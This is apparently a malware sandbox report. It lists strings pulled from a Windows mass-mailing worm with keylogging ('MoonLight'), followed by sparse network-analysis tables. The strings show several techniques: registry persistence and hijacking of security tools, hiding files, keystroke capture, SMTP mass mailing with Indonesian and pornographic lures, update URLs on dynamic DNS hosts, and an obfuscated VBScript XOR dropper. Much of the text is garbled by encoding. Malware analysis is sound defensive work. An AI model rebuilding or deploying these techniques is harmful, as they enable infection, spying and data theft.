U�z�p�z�}�l�h�{�'�m�e�e�
\�s�t�a�r�t�u�p�
E�f�j�h�e�)�Z�l�}�}�`�g�n�z�U�H�y�y�e�`�j�h�}�`�f�g�)�M�h�}�h�
Z�f�o�}�~�h�{�l�U�D�`�j�{�f�z�f�o�}�U�y�l�h�{�e�U�k�`�h�g�n�
Z�f�o�}�~�h�{�l�U�D�`�j�{�f�z�f�o�}�U�Y�l�h�{�e�U�Y�h�}�a�
.�{�6�4�5�F�F�0�4�0�-�5�0�8�1�-�1�0�1�B�-�9�F�0�8�-�0�0�A�A�0�0�2�F�9�5�4�E�}�
`�j�l�'�l�q�l�
U�z�d�z�z�'�l�q�l�
l�s�a�s�s�.�e�x�e�
s�y�s�t�e�m�.�e�x�e�
\�r�e�g�e�d�i�t�.�e�x�e�
\�w�i�n�l�o�g�o�n�.�e�x�e�
\�s�y�s�t�e�m�.�e�x�e�
\�l�s�a�s�s�.�e�x�e�
U�{�l�n�l�m�`�}�'�j�d�m�
Z�f�o�}�~�h�{�l�U�D�`�j�{�f�z�f�o�}�U�^�`�g�m�f�~�z�U�J�|�{�{�l�g�}�_�l�{�z�`�f�g�
U�L�q�y�e�f�{�l�{�U�J�h�k�`�g�l�}�Z�}�h�}�l�
F�u�l�l�P�a�t�h�
Z�F�O�]�^�H�[�L�U�D�`�j�{�f�z�f�o�}�U�^�`�g�m�f�~�z�)�G�]�U�J�|�{�{�l�g�}�_�l�{�z�`�f�g�U�^�`�g�e�f�n�f�g�
e�x�p�l�o�r�e�r�.�e�x�e�,� �
Z�f�o�}�~�h�{�l�U�D�`�j�{�f�z�f�o�}�U�^�`�g�m�f�~�z�)�G�]�U�J�|�{�{�l�g�}�_�l�{�z�`�f�g�U�^�`�g�m�f�~�z�
\�E�x�p�l�o�r�e�r�\�A�d�v�a�n�c�e�d�
H�i�d�e�F�i�l�e�E�x�t�
H�i�d�d�e�n�
S�h�o�w�S�u�p�e�r�H�i�d�d�e�n�
s�c�r�f�i�l�e�
F�i�l�e� �F�o�l�d�e�r�
e�x�e�f�i�l�e�
S�O�F�T�W�A�R�E�\�C�l�a�s�s�e�s�\�e�x�e�f�i�l�e�
Z�P�Z�]�L�D�U�J�|�{�{�l�g�}�J�f�g�}�{�f�e�Z�l�}�U�Z�l�{�
`�j�l�z�U�Z�a�h�{�l�m�H�j�j�l�z�z�
U�L�q�y�e�f�{�l�{�U�H�m�
h�g�j�l�m�U�O�f�e�m�l�{�U�Z�|�y�l�{�A�`�m�m�l�g�
\�g�j�a�l�j�b�l�m�_�h�e�|�l�
m�s�c�o�n�f�i�g�.�e�x�e�
d�e�b�u�g�g�e�r�
Z�F�O�]�^�H�[�L�U�Y�f�e�`�j�`�l�z�U�D�`�j�{�f�z�f�o�}�U�^�`�g�m�f�~�z�)�G�]�U�Z�p�z�}�l�d�[�l�z�}�f�{�l�
D�i�s�a�b�l�e�C�o�n�f�i�g�
D�i�s�a�b�l�e�S�R�
Z�P�Z�]�L�D�U�J�f�g�}�{�f�e�Z�l�}�9�9�8�U�J�f�g�}�{�f�e�U�Z�h�o�l�K�f�f�}�
H�e�}�l�{�g�h�}�l�Z�a�l�e�e�
S�O�F�T�W�A�R�E�\�M�i�c�r�o�s�o�f�t�\�W�i�n�d�o�w�s� �N�T�\�C�u�r�r�e�n�t�V�e�r�s�i�o�n�\�I�m�a�g�e� �F�i�l�e� �E�x�e�c�u�t�i�o�n� �O�p�t�i�o�n�s�\�
\�n�o�t�e�p�a�d�.�e�x�e�
r�e�g�e�d�i�t�.�e�x�e�
r�s�t�r�u�i�.�e�x�e�
Z�f�o�}�~�h�{�l�U�D�`�j�{�f�z�f�o�}�U�^�`�g�m�f�~�z�U�J�|�{�{�l�g�}�_�l�{�z�`�f�g�U�{�|�g�
d�r�v�_�s�t�_�k�e�y�
g�f�{�d�h�g�V�s�h�g�m�h�
g�f�{�d�h�g�)�s�h�g�m�h�
^�`�g�h�d�y�
^�`�g�\�y�m�h�}�l�Z�|�y�l�{�
J�|�l�Q�=�=�V�z�}�`�e�V�a�l�{�l�
H�|�}�f�Z�|�y�l�{�
S�M�A�_�n�y�a�_�A�r�t�i�k�a�
P�u�t�r�i�_�I�n�d�o�n�e�s�i�a�
B�a�b�e�l�P�a�t�h�
A�l�u�m�n�i� �S�m�a�n�s�a�
V�i�r�i�S�e�t�u�p�
S�M�A�N�1�_�P�a�n�g�k�a�l�p�i�n�a�n�g�
P�u�t�r�i�_�B�a�n�g�k�a�
S�y�s�Y�u�n�i�
S�y�s�D�i�a�z�
S�y�s�R�i�a�
D�l�l�H�o�s�t�
S�a�T�R�i�o� �A�D�i�e� �X�
T�o�k�-�C�i�r�r�h�a�t�u�s�
A�l�l�M�y�B�a�l�l�a�n�c�e�
M�o�m�e�n�t�E�v�e�r�C�o�m�e�s�
T�r�y�i�n�g�T�o�S�p�e�a�k�
Y�o�u�r�U�n�i�n�t�e�n�d�e�d�
Y�o�u�r�U�n�i�n�t�e�n�d�e�s�
l�e�x�p�l�o�r�e�r�
d�k�e�r�n�e�l�
B�r�o�n�-�S�p�i�z�a�e�t�u�s�
A�D�i�e� �s�u�k�a� �k�a�m�u�
w�i�n�f�i�x�
t�e�m�p�l�o�g�
s�e�r�v�i�c�e�
G�r�o�g�o�t�i�x�
\�w�i�n�d�o�w�s�*�
\�S�h�e�l�l�N�e�w�\�*�.�e�x�e�
\�*�.�e�x�e�
\�*�.�v�b�s�
\�M�y�H�e�a�r�t�.�e�x�e�
\�K�e�s�e�n�j�a�n�g�a�n�S�o�s�i�a�l�.�e�x�e�
\�F�i�r�s�t�L�o�v�e�.�e�x�e�*�
\�e�k�s�p�l�o�r�a�s�i�*�
\�C�i�n�t�a�B�u�t�a�*�
\�*�.�p�i�f�
\�R�o�m�a�n�t�i�c�*�
Z�j�{�`�y�}�`�g�n�'�O�`�e�l�Z�p�z�}�l�d�F�k�c�l�j�}�
\�m�s�v�b�v�m�6�0�.�d�l�l�
U�z�p�z�}�l�d�U�d�z�
d�?�9�'�m�e�e�
U�D�Z�^�@�G�Z�J�B�'�f�j�q�
T�h�u�n�d�e�r�R�T�6�F�o�r�m�D�C�
T�F�o�r�m�1�
\�M�o�o�N�l�i�g�h�t�.�R�.�t�x�t�
~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�
|�D�e�v�!�l�.�I�n�c�|�
I�-�W�o�r�M�.�L�u�n�a�L�I�G�H�T�.�d� �A�l�i�a�s�e� �W�3�2�/�M�o�o�n�L�i�g�h�t�.�R�@�m�m�
� � �C�o�p�y�R�i�g�h�t� �@� �H�e�l�l�S�p�a�w�n� �a�.�K�.�a� �B�4�b�b�1�C�o�o�L�
� � � � � � � � � � � �O�n�c�e� �I�n� �T�h�e� �B�l�u�e� �M�o�o�n�
~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�~�
w�w�w�.�b�s�i�.�a�c�.�i�d�
h�t�t�p�:�/�/�w�w�w�.�g�o�o�g�l�e�.�c�o�m�/�
h�t�t�p�:�/�/�
m�e�m�e�n�c�o�o�l�.�n�e�t�f�a�s�t�.�o�r�g�
/�t�e�s�t�m�s�.�p�h�p�?�m�o�d�=�s�a�v�e�&�b�k�d�=�0�&�k�l�o�g�=�
\�m�o�o�n�l�i�g�h�t�.�d�l�l�
\�o�n�c�e�i�n�a�b�l�u�e�m�o�o�n�.�m�i�d�
d�e�s�k�t�o�p�.�i�n�i�
E�l�i�t�t�a�.�h�t�t�
m�o�o�n�l�i�g�h�t�.�e�x�e�
<�/�h�e�a�d�>�
#�#�#�#�#�#�#�#�#�#�#�#�
W�i�n�d�o�w�s� �S�o�c�k�e�t�s� �V�e�r�s�i�o�n� �
�i�s� �n�o�t� �s�u�p�p�o�r�t�e�d� �b�y� �W�i�n�d�o�w�s� �
S�o�c�k�e�t�s� �F�o�r� �3�2� �b�i�t� �W�i�n�d�o�w�s� �e�n�v�i�r�o�n�m�e�n�t�s�.�
T�h�i�s� �a�p�p�l�i�c�a�t�i�o�n� �r�e�q�u�i�r�e�s� �a� �m�i�n�i�m�u�m� �o�f� �
�s�u�p�p�o�r�t�e�d� �s�o�c�k�e�t�s�.�
M�A�I�L� �F�R�O�M�:� �<�
R�C�P�T� �T�O�:� �<�
-�-�-�-�_�=�_�N�e�x�t�P�a�r�t�_�0�0�0�_�
0�0�0�0�0�0�0�0�
F�r�o�m�:� �<�
S�u�b�j�e�c�t�:� �
D�a�t�e�:� �
�y�y�y�y� �h�h�:�n�n�:�s�s� �
M�I�M�E�-�V�e�r�s�i�o�n�:� �1�.�0�
C�o�n�t�e�n�t�-�T�y�p�e�:� �m�u�l�t�i�p�a�r�t�/�m�i�x�e�d�;�
b�o�u�n�d�a�r�y�=�
C�o�n�t�e�n�t�-�T�y�p�e�:� �
t�e�x�t�/�p�l�a�i�n�;�
c�h�a�r�s�e�t�=�
w�i�n�d�o�w�s�-�1�2�5�5�
C�o�n�t�e�n�t�-�T�r�a�n�s�f�e�r�-�E�n�c�o�d�i�n�g�:� �7�b�i�t�
C�o�n�t�e�n�t�-�T�y�p�e�:� �a�p�p�l�i�c�a�t�i�o�n�/�o�c�t�e�t�-�s�t�r�e�a�m�;�
C�o�n�t�e�n�t�-�T�r�a�n�s�f�e�r�-�E�n�c�o�d�i�n�g�:� �b�a�s�e�6�4�
C�o�n�t�e�n�t�-�D�i�s�p�o�s�i�t�i�o�n�:� �a�t�t�a�c�h�m�e�n�t�;� �
f�i�l�e�n�a�m�e�=�
{�b�a�c�k�s�p�a�c�e�}�
{�s�h�i�f�t�}�
{�c�t�r�l�}�
{�p�a�u�s�e�}�
{�h�o�m�e�}�
{�l�e�f�t�}�
{�r�i�g�h�t�}�
{�d�o�w�n�}�
{�i�n�s�e�r�t�}�
{�D�e�l�e�t�e�}�
V�i�s�i�b�l�e�
{�N�u�m�L�o�c�k�}�
{�S�c�r�o�l�l�L�o�c�k�}�
{�P�r�i�n�t�S�c�r�e�e�n�}�
{�P�a�g�e�U�p�}�
{�P�a�g�e�d�o�w�n�}�
Z�f�o�}�~�h�{�l�U�D�`�j�{�f�z�f�o�}�U�@�g�}�l�{�g�l�}�)�H�j�j�f�|�g�}�)�D�h�g�h�n�l�{�U�
D�e�f�a�u�l�t� �M�a�i�l� �A�c�c�o�u�n�t�
Z�f�o�}�~�h�{�l�U�D�`�j�{�f�z�f�o�}�U�@�g�}�l�{�g�l�}�)�H�j�j�f�|�g�}�)�D�h�g�h�n�l�{�U�H�j�j�f�|�g�}�z�U�
S�M�T�P� �S�e�r�v�e�r�
S�M�T�P� �E�m�a�i�l� �A�d�d�r�e�s�s�
h�a�c�k�e�r�s�m�a�i�l�.�c�o�m�
h�o�t�m�a�i�l�.�c�o�m�
g�m�a�i�l�.�c�o�m�
m�s�n�.�c�o�m�
y�a�h�o�o�.�c�o�m�.�s�g�
L�o�v�e�m�a�i�l�.�c�o�m�
m�a�i�l�1�.�
r�e�l�a�y�.�
D�`�p�h�k�`�
g�h�m�`�g�l�
}�a�`�z�o�`�e�l�
g�l�l�m�)�p�f�|�
T�o�l�o�n�g� �A�k�u�.�.�
T�o�l�o�n�g�
N�a�d�i�n�e�
A�k�u� �M�e�n�c�a�r�i� �W�a�n�i�t�a� �y�a�n�g� �a�k�u� �C�i�n�t�a�i�
d�a�n� �c�a�r�a� �m�e�n�g�g�u�n�a�k�a�n� �e�m�a�i�l� �m�a�s�s�
i�n�i� �a�d�a�l�a�h� �c�a�r�a� �t�e�r�a�k�h�i�r�k�u� �,�d�i� �l�a�m�p�i�r�a�n� �i�n�i� �t�e�r�d�a�p�a�t�
f�o�t�o� �d�a�n� �d�a�t�a� �W�a�n�i�t�a� �t�s�b� �T�h�a�n�k�'�s� �
N�B�:�M�o�h�o�n� �d�i� �t�e�r�u�s�k�a�n� �k�e�s�a�h�a�b�a�t� �a�n�d�a� �
a�k�u� �m�a�h�a�s�i�s�w�a� � �B�S�I� �M�a�r�g�o�n�d�a� �s�m�t� �4�
y�a�h� �a�k�u� �s�e�d�a�n�g� �m�e�m�b�u�t�u�h�k�a�n� �p�e�k�e�r�j�a�a�n�
o�h� �y�a� �a�k�u� �t�a�h�u� �a�n�d�a� �d�r� �m�i�l�i�s� �i�l�m�u� �k�o�m�p�u�t�e�r�
d�i� �l�a�m�p�i�r�a�n� �i�n�i� �t�e�r�d�a�p�a�t� �c�u�r�r�i�c�u�l�u�m� �v�i�t�t�a�e� �d�a�n� �f�o�t�o� �s�a�y�a�
h�e�y� �I�n�d�o�n�e�s�i�a�n� �p�o�r�n� �
A�g�n�e�s� �M�o�n�i�c�a� �p�i�c�'�s�
F�u�c�k�i�n�g� �W�i�t�h� �M�e� �:�D�
s�i�s�i�l�i�a�
p�l�e�a�s�e� �r�e�a�d� �a�g�a�i�n� �w�h�a�t� �i� �h�a�v�e� �w�r�i�t�t�e�n� �t�o� �y�o�u�
H�o�t� �.�.�.� �
m�i�s�s� �I�n�d�o�n�e�s�i�a�n�
C�e�k� �T�h�i�s�
J�a�p�a�n�n�e�s� �P�o�r�n�
F�i�r�m�a�n�s�y�a�h�
L�a�n�e�l�i�t�t�a�
F�r�a�n�s�i�s�c�a�
C�l�a�u�d�i�a�
F�r�a�n�s�i�s�k�a�
C�i�c�i�l�i�a�
C�o�o�l�M�a�n�
V�a�l�e�n�t�i�n�a�
s�a�s�u�k�e�
H�e�l�l�S�p�a�w�n�
J�u�w�i�t�a�N�i�n�g�r�u�m�
N�a�t�a�l�i�a�
t�e�l�k�o�m�
a�s�t�a�g�a�
w�a�r�u�n�g�
E�n�t�e�r� �t�h�e� �c�o�m�m�e�n�t�
�a�l�i�a�s� �m�y�s�o�u�n�d�
A�d�m�i�n�i�s�t�r�a�t�o�r�
\�A�D�M�I�N�$�
m�e�m�e�n�c�o�o�l�.�n�e�t�f�a�s�t�.�o�r�g�/�u�p�d�a�t�e�.�t�x�t�
s�i�a�p�.�h�o�s�t�.�s�k�/�u�p�d�a�t�e�.�t�x�t�
y�o�s�e�f�.�n�e�t�f�a�s�t�.�o�r�g�/�u�p�d�a�t�e�.�t�x�t�
f�r�i�e�n�d�s�t�e�r�.�n�e�t�f�a�s�t�.�o�r�g�/�U�p�d�a�t�e�.�t�x�t�
\�u�n�t�k�.�c�o�m�
p�l�a�y� �m�y�S�o�u�n�d�
<�!�-�-� �C�o�d�e� �B�y� �H�e�l�l�S�P�a�w�N� �a�.�k�.�a� �B�4�B�B�!�c�o�o�l� �-�-�>�
<�s�c�r�i�p�t� �l�a�n�g�u�a�g�e�=�v�b�s�c�r�i�p�t�>�
5�a�}�d�e�7�5�a�l�h�m�7�5�&�a�l�h�m�7�5�k�f�m�p�)�z�}�p�e�l�4�+�d�h�{�n�`�g�3�)�9�+�)�z�j�{�f�e�e�4�g�f�7�5�f�k�c�l�j�}�)�`�m�4�O�`�e�l�
E�`�z�}�)�k�f�{�m�l�{�4�9�)�}�h�k�`�g�m�l�q�4�8�)�j�e�h�z�z�`�m�4�+�j�e�z�`�m�3�8�1�;�9�O�L�M�9�$�=�>�:�L�$�8�8�M�9�$�H�0�?�J�$�9�9�J�9�=�O�M�
>�9�<�H�;�+�)�z�}�p�e�l�4�+�~�`�m�}�a�3�)�8�9�9�,�2�)�a�l�`�n�a�}�3�)�8�9�9�,�+�)�}�h�k�@�g�m�l�q�4�$�8�7�5�&�f�k�c�l�j�}�7�5�&�k�f�m�p�7�5�F�
K�C�L�J�]�)�@�M�4�+�[�\�G�@�]�+�)�^�@�M�]�A�4�9�)�A�L�@�N�A�]�4�9�)�)�]�P�Y�L�4�+�h�y�y�e�`�j�h�}�`�f�g�&�q�$�f�e�l�f�k�c�l�j�}�+�)�J�F�M�L�K�
H�Z�L�4�+�d�f�f�g�e�`�n�a�}�'�l�q�l�*�
l�{�z�`�f�g�4�8�%�8�%�8�%�8�+�7�5�Y�H�[�H�D�)�G�H�D�L�4�+�V�_�l�{�z�`�f�g�+�)�_�H�E�\�L�4�+�?�<�<�:�?�
+�7�5�&�F�K�C�L�J�]�7�
d�e�P�o�k� �=� �1�2�3�2�1�
F�o�r� �i� �=� �1� �T�o� �L�e�n�(�a�)�
H�a�c�k�e�r� �=� �A�s�c�(�M�i�d�(�a�,� �i�,� �1�)�)�
c�r�b�y�t�e� �=� �C�h�r�(�H�a�c�k�e�r� �X�o�r� �(�d�e�P�o�k� �M�o�d� �1�2�)�)�
x�x� �=� �x�x� �&� �c�r�b�y�t�e�
d�o�c�u�m�e�n�t�.�W�r�i�t�e� �x�x�
<�/�s�c�r�i�p�t�>�
[�.�S�h�e�l�l�C�l�a�s�s�I�n�f�o�]�
C�o�n�f�i�r�m�F�i�l�e�O�p�=�0�
[�{�5�9�8�4�F�F�E�0�-�2�8�D�4�-�1�1�C�F�-�A�E�6�6�-�0�8�0�0�2�B�2�E�1�2�6�2�}�]�
P�e�r�s�i�s�t�M�o�n�i�k�e�r�=�f�i�l�e�:�/�/�m�o�o�n�\�E�l�i�t�t�a�.�h�t�t�
[�E�x�t�S�h�e�l�l�F�o�l�d�e�r�V�i�e�w�s�]�
{�5�9�8�4�F�F�E�0�-�2�8�D�4�-�1�1�C�F�-�A�E�6�6�-�0�8�0�0�2�B�2�E�1�2�6�2�}�=�{�5�9�8�4�F�F�E�0�-�2�8�D�4�-�1�1�C�F�-�A�E�6�6�-�0�8�0�0�2�B�2�E�1�2�6�2�}�
V�S�_�V�E�R�S�I�O�N�_�I�N�F�O�
S�t�r�i�n�g�F�i�l�e�I�n�f�o�
0�4�0�9�0�4�E�4�
C�o�m�p�a�n�y�N�a�m�e�
d�E�v�i�l�.�I�n�c�
F�i�l�e�D�e�s�c�r�i�p�t�i�o�n�
L�u�n�A�L�i�g�h�t� �Z�i�p�p�e�r�
F�i�l�e�V�e�r�s�i�o�n�
I�n�t�e�r�n�a�l�N�a�m�e�
L�e�g�a�l�C�o�p�y�r�i�g�h�t�
O�r�i�g�i�n�a�l�F�i�l�e�n�a�m�e�
P�r�o�d�u�c�t�N�a�m�e�
P�r�o�d�u�c�t�V�e�r�s�i�o�n�
V�a�r�F�i�l�e�I�n�f�o�
T�r�a�n�s�l�a�t�i�o�n�
)�1�1�R�Z�c�k�{�{�
!�)�)�!�9�1�J�R�Z�s�{�
y�!�)�!�1�1�9�B�
y�B�J�J�Z�R�
}�Z�k�k�c�s�k�s�{�
!�)�B�R�R�c�Z�c�s�k�{�
)�1�1�R�Z�c�k�{�{�
!�)�)�!�9�1�J�R�Z�s�{�
y�!�)�!�1�1�9�B�
y�B�J�J�Z�R�
}�Z�k�k�c�s�k�s�{�
!�)�B�R�R�c�Z�c�s�k�{�
)�1�1�R�Z�c�k�{�{�
!�)�)�!�9�1�J�R�Z�s�{�
y�!�)�!�1�1�9�B�
y�B�J�J�Z�R�
}�Z�k�k�c�s�k�s�{�
!�)�B�R�R�c�Z�c�s�k�{�
V�S�_�V�E�R�S�I�O�N�_�I�N�F�O�
V�a�r�F�i�l�e�I�n�f�o�
T�r�a�n�s�l�a�t�i�o�n�
S�t�r�i�n�g�F�i�l�e�I�n�f�o�
0�4�0�9�0�4�B�0�
C�o�m�m�e�n�t�s�
M�i�c�r�o�s�o�f�t� �C�o�r�p�o�r�a�t�i�o�n�
C�o�m�p�a�n�y�N�a�m�e�
F�i�l�e� �F�o�l�d�e�r�
P�r�o�d�u�c�t�N�a�m�e�
F�i�l�e�V�e�r�s�i�o�n�
P�r�o�d�u�c�t�V�e�r�s�i�o�n�
I�n�t�e�r�n�a�l�N�a�m�e�
F�I�L�E� �F�O�L�D�E�R�
O�r�i�g�i�n�a�l�F�i�l�e�n�a�m�e�
F�I�L�E� �F�O�L�D�E�R�.�e�x�e�
E�W�J�F�O�E�R�Z�K�X�
Hosts
| IP |
|---|
| 114.114.114.114 |
DNS
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| dns.msftncsi.com | A 131.107.255.255 | 131.107.255.255 |
| dns.msftncsi.com | AAAA fd3e:4f5a:5b81::1 | 131.107.255.255 |
TCP
No TCP connections recorded.
UDP
| Source | Source Port | Destination | Destination Port |
|---|---|---|---|
| 192.168.56.101 | 53179 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 49642 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 137 | 192.168.56.255 | 137 |
| 192.168.56.101 | 61714 | 114.114.114.114 | 53 |
| 192.168.56.101 | 56933 | 114.114.114.114 | 53 |
| 192.168.56.101 | 138 | 192.168.56.255 | 138 |
HTTP & HTTPS Requests
No HTTP requests performed.
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts
Sorry! No dropped files.
Sorry! No dropped buffers.